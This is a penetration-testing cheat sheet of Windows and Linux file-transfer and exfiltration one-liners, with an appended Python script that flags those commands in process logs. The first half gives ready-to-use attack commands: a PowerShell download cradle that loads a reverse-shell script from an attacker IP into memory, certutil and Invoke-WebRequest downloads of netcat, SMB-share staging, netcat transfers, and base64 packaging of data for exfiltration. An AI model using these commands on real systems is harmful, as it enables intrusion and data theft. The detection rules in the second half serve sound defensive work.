Load PS1 in memory

powershell "IEX(New-Object Net.WebClient).downloadString('http://192.168.119.122/Utilities/Revshells/shell.ps1')"

Windows upload via certutil.exe

certutil.exe -split -urlcache -f http://192.168.119.122/Utilities/Binaries/nc.exe

Windows upload via powershell

powershell Invoke-WebRequest -Uri "http://192.168.119.122/Utilities/Binaries/nc.exe" -OutFile C:\temp\nc.exe

SMBServer is a good option for Windows when dealing with firewalls and when port 80 is needed for catching shells

#Kali
smbserver.py -smb2support a .
#Victim
\\IP\a\nc.exe

File Upload Windows route bypass

C:\Windows\System32\spool\drivers\color

Netcat Transfers

nc 10.10.10.15 4444 < file_to_transfer #sender
nc -lvnp 4444 > file_to_transfer #receiver (listener)

SCP transfer (requires ssh access)

scp user@ip:/filename /path #from
scp filename user@ip:/path #to

Data exfiltration via base64

#Linux
zip -e -r exfil.zip dir_name
cat exfil.zip | base64 > exfil.txt
#Windows
powershell Compress-Archive -LiteralPath dir -DestinationPath ./exfil.zip
certutil -encode exfil.zip exfil.txt
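
The Windows transfer commands above leave recognisable process command lines. As an added example (not part of the original notes), this Python sketch flags them in process-creation log lines; the rule names are hypothetical labels and the sample lines and addresses are constructed.

```python
import re

# Rule names are hypothetical; each pattern mirrors one command form from these notes.
RULES = [
    ("ps_download_cradle", re.compile(r"\bIEX\b.*downloadString\s*\(", re.I)),
    ("certutil_urlcache", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b", re.I)),
    ("certutil_encode", re.compile(r"\bcertutil(\.exe)?\b.*-encode\b", re.I)),
    ("iwr_outfile", re.compile(r"\bInvoke-WebRequest\b.*-OutFile\b", re.I)),
    # Executable launched straight from a UNC share: \\host\share\file.exe
    ("unc_exec", re.compile(r"^\\\\[^\\\s]+\\[^\\\s]+\\\S+\.exe\b", re.I)),
    # Anything referenced under the spool\drivers\color directory
    ("color_dir_path", re.compile(r"\\spool\\drivers\\color\\", re.I)),
]

def classify(cmdline):
    """Return the names of all rules matching one process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Return (line_number, rule_names, cmdline) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        matched = classify(line.strip())
        if matched:
            hits.append((n, matched, line.strip()))
    return hits

# Constructed sample command lines, as a process-creation log would record them.
SAMPLE = [
    r'''powershell "IEX(New-Object Net.WebClient).downloadString('http://192.0.2.10/a.ps1')"''',
    r"certutil.exe -split -urlcache -f http://192.0.2.10/tool.exe",
    r'powershell Invoke-WebRequest -Uri "http://192.0.2.10/tool.exe" -OutFile C:\temp\tool.exe',
    r"\\192.0.2.10\a\tool.exe",
    r"certutil -encode exfil.zip exfil.txt",
    r"C:\Windows\System32\spool\drivers\color\tool.exe",
    r"certutil -verify cert.cer",           # benign certutil use, must not match
    r"notepad.exe C:\Users\bob\notes.txt",  # unrelated process, must not match
]

if __name__ == "__main__":
    for n, rules, cmd in scan(SAMPLE):
        print(f"line {n}: {','.join(rules)} :: {cmd}")
```

Substring rules like these are a triage starting point; expect to tune them against legitimate administrative use of certutil and Invoke-WebRequest in your environment.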